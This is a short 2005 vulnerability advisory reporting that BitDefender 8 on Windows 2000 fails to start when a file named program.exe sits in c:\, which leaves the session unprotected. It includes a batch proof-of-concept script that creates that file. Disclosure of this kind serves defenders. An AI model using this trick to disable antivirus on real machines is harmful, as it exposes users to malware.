BitDefender 8 - Race condition vulnerability
-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------
BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com
VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...
RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup.
(Sorry, haven't got the exact english message)
At this moment, BitDefender can't start, so we have a session without virus
protection.
PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.
@echo off
echo #-------------------------------------------------------#
echo [ SecuBox - Proof of Concept (04.12.2005) ]
echo #-------------------------------------------------------#
echo # This script just create the race condition. #
echo # It might be use by virus. #
echo # Now, reboot your computer and watch your BitDef ! #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient ! #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit
EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.
VENDOR STATUS
-------------
Vendor have been contacted but no reply ...
CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@xxxxxxxxxxx
----------------------